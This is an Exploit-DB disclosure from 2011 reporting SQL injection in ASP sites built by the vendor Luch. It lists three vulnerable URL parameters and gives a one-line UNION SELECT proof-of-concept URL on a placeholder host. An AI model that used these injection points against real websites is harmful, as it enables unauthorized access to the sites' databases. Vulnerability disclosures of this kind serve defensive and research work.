Luch Web Designer - Multiple SQL Injections

EDB-ID:

16953

CVE:

N/A


Author:

p0pc0rn

Type:

webapps


Platform:

ASP

Date:

2011-03-10


Title	: Web Designed by LUCH Vulnerable to SQL Injection
Vendor	: http://www.luch.co.il
Found by: p0pc0rn

SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a